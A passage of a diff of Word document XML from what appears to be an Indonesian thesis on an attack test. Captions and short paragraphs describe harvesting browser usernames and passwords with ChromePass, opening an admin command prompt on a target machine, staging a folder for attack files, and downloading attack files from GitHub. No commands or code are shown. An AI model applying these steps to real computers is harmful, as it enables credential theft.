                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5040630" cy="945515"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="128" w:name="_Toc43087616"/>
+      <w:bookmarkStart w:id="129" w:name="_Toc43087910"/>
+      <w:bookmarkStart w:id="130" w:name="_Toc43425296"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar IV- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_IV- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang Diambil oleh ChromePass</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="128"/>
+      <w:bookmarkEnd w:id="129"/>
+      <w:bookmarkEnd w:id="130"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="633"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="633"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A76AE75" wp14:editId="0419A557">
+            <wp:extent cx="5040630" cy="991235"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
+            <wp:docPr id="46" name="Picture 46"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5040630" cy="991235"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -34036,7 +34022,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="134" w:name="_Toc43426562"/>
+      <w:bookmarkStart w:id="134" w:name="_Toc43427729"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -35082,7 +35068,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="138" w:name="_Toc43426563"/>
+      <w:bookmarkStart w:id="138" w:name="_Toc43427730"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -35107,7 +35093,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="139" w:name="_Toc43426564"/>
+      <w:bookmarkStart w:id="139" w:name="_Toc43427731"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -35167,7 +35153,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="140" w:name="_Toc43426565"/>
+      <w:bookmarkStart w:id="140" w:name="_Toc43427732"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -35258,133 +35244,6 @@
             <wp:extent cx="3848100" cy="2009775"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="31" name="Picture 31"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3848100" cy="2009775"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="141" w:name="_Toc43425322"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar V- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>. Membuka CMD Sebagai Admin</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="141"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:keepNext/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052AE448" wp14:editId="4AB0C038">
-            <wp:extent cx="4506163" cy="2089025"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
-            <wp:docPr id="47" name="Picture 47"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -35404,7 +35263,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4522017" cy="2096375"/>
+                      <a:ext cx="3848100" cy="2009775"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -35420,7 +35279,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:firstLine="288"/>
+        <w:ind w:left="720"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35428,7 +35287,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="142" w:name="_Toc43425323"/>
+      <w:bookmarkStart w:id="141" w:name="_Toc43425322"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35463,7 +35322,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35478,116 +35337,18 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>. Masuk ke dalam CMD Sebagai Admin</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="142"/>
+        <w:t>. Membuka CMD Sebagai Admin</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="141"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:firstLine="288"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:ind w:firstLine="288"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">V-2 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>menunjukkan bahwa percobaan untuk membuat folder pada komputer target dapa</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>t dilanjutkan karena sudah berhasil</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> masuk kedalam CMD sebagai admin, Gambar V-3 menunjukkan baris perintah untuk membuat folder sekaligus pindah kedalam folder tersebut.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
@@ -35597,17 +35358,19 @@
         <w:pStyle w:val="Caption"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17FFDEC3" wp14:editId="00F8E6D5">
-            <wp:extent cx="4557166" cy="2112670"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
-            <wp:docPr id="54" name="Picture 54"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052AE448" wp14:editId="4AB0C038">
+            <wp:extent cx="4506163" cy="2089025"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="47" name="Picture 47"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -35627,7 +35390,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4717066" cy="2186799"/>
+                      <a:ext cx="4522017" cy="2096375"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -35643,14 +35406,15 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:firstLine="431"/>
+        <w:ind w:firstLine="288"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="143" w:name="_Toc43425324"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="142" w:name="_Toc43425323"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35685,7 +35449,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>3</w:t>
+        <w:t>2</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35700,33 +35464,45 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>. Perintah Membuat Folder</w:t>
-      </w:r>
-      <w:r>
+        <w:t>. Masuk ke dalam CMD Sebagai Admin</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="142"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="288"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="288"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:noProof/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Baru</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="143"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
         <w:tab/>
       </w:r>
     </w:p>
@@ -35746,20 +35522,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Gambar V-4 berikut ini menampilkan bahwa</w:t>
+        <w:t xml:space="preserve">Gambar </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35769,19 +35538,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> folder baru berhasil dibuat untuk digunakan sebagai penyimpanan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>file</w:t>
+        <w:t xml:space="preserve">V-2 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35791,15 +35548,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sementara selama berlangsungnya penyerangan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
+        <w:t>menunjukkan bahwa percobaan untuk membuat folder pada komputer target dapa</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
@@ -35807,6 +35558,24 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:t>t dilanjutkan karena sudah berhasil</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> masuk kedalam CMD sebagai admin, Gambar V-3 menunjukkan baris perintah untuk membuat folder sekaligus pindah kedalam folder tersebut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -35814,19 +35583,17 @@
         <w:pStyle w:val="Caption"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
+        <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69371EC0" wp14:editId="5A4CB504">
-            <wp:extent cx="4609301" cy="2948025"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
-            <wp:docPr id="55" name="Picture 55"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17FFDEC3" wp14:editId="00F8E6D5">
+            <wp:extent cx="4557166" cy="2112670"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="54" name="Picture 54"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -35846,7 +35613,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4634657" cy="2964242"/>
+                      <a:ext cx="4717066" cy="2186799"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -35862,16 +35629,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:ind w:firstLine="431"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="144" w:name="_Toc43425325"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="143" w:name="_Toc43425324"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35906,7 +35671,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>4</w:t>
+        <w:t>3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35921,200 +35686,133 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>. Folder Baru Berhasil Dibuat</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="144"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>. Perintah Membuat Folder</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Baru</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="143"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:ind w:hanging="11"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="145" w:name="_Toc43426566"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pengujian Mengunduh </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Gambar V-4 berikut ini menampilkan bahwa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> folder baru berhasil dibuat untuk digunakan sebagai penyimpanan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>File</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dari Github</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="145"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sementara selama berlangsungnya penyerangan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pada tahap ini akan dilakukan pengujian dengan mengunduh </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dari Github penulis yang nantinya akan digunakan selama proses penyerangan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>. Namun</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sebelum mengunduh </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
